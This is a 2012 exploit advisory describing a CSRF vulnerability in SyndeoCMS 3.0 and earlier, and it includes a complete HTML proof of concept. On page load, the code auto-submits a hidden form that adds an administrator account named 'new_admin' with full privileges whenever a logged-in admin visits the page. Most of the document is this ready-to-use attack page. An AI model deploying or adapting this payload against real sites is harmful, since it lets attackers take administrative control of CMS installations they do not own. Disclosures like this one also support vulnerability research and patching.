+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : SyndeoCMS <= 3.0 CSRF Vulnerability # Date : 19-02-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Vendor site : http://www.syndeocms.org/ # Software link : http://sourceforge.net/projects/syndeocms # Version : 3.0 and lower # Tested on : Debian Squeeze (6.0) +--------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------[Add Admin Account by Ivano Binetti]--------------------------------------------------+ Summary 1)Introduction 2)Description 3)Exploit +---------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction The aim of this brief document is to describe a new CSRF vulnerability found into SyndeoCMS 3.0 and lower version and related exploit. 2)Description This kind of vulnerability allows an attacker to add an administrator account into SyndeoCMS 3.0 (and lower) when an authenticated admin browses a web page containing the following html/javascript code. 3)Exploit <html> <body onload="javascript:document.forms[0].submit()"> <H2>I'm adding ADMIN account</H2> <form method="POST" name="form0" action="http://127.0.0.1:80/syndeocms/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id="> <input type="hidden" name="fullname" value="new_admin"/> <input type="hidden" name="username" value="new_admin"/> <input type="hidden" name="password" value="password"/> <input type="hidden" name="email" value="admin@admin.com"/> <input type="hidden" name="editor" value="2"/> <input type="hidden" name="sections" value=""/> <input type="hidden" name="access_1" value="1"/> <input type="hidden" name="access_2" value="1"/> <input type="hidden" name="access_13" value="1"/> <input type="hidden" name="access_3" value="1"/> <input type="hidden" name="access_4" value="1"/> <input type="hidden" name="access_5" value="1"/> <input type="hidden" name="access_6" value="1"/> <input type="hidden" name="access_7" value="1"/> <input type="hidden" name="access_8" value="1"/> <input type="hidden" name="access_9" value="1"/> <input type="hidden" name="access_16" value="1"/> <input type="hidden" name="access_10" value="1"/> <input type="hidden" name="access_11" value="1"/> <input type="hidden" name="access_12" value="1"/> <input type="hidden" name="access_14" value="1"/> <input type="hidden" name="access_15" value="1"/> <input type="hidden" name="m_access%5B6%5D" value="1"/> <input type="hidden" name="m_access%5B8%5D" value="1"/> <input type="hidden" name="m_access%5B10%5D" value="1"/> <input type="hidden" name="m_access%5B11%5D" value="1"/> <input type="hidden" name="m_access%5B0%5D" value="1"/> <input type="hidden" name="m_access%5B1%5D" value="1"/> <input type="hidden" name="m_access%5B13%5D" value="1"/> <input type="hidden" name="m_access%5B12%5D" value="1"/> <input type="hidden" name="m_access%5B14%5D" value="1"/> <input type="hidden" name="m_access%5B15%5D" value="1"/> <input type="hidden" name="m_access%5B7%5D" value="1"/> <input type="hidden" name="m_access%5B19%5D" value="1"/> <input type="hidden" name="m_access%5B2%5D" value="1"/> <input type="hidden" name="m_access%5B16%5D" value="1"/> <input type="hidden" name="m_access%5B17%5D" value="1"/> <input type="hidden" name="m_access%5B18%5D" value="1"/> <input type="hidden" name="m_access%5B3%5D" value="1"/> <input type="hidden" name="m_access%5B4%5D" value="1"/> <input type="hidden" name="m_access%5B9%5D" value="1"/> <input type="hidden" name="m_access%5B5%5D" value="1"/> </form> </body> +----------------------------------------------------------------------------------------------------------------------------------+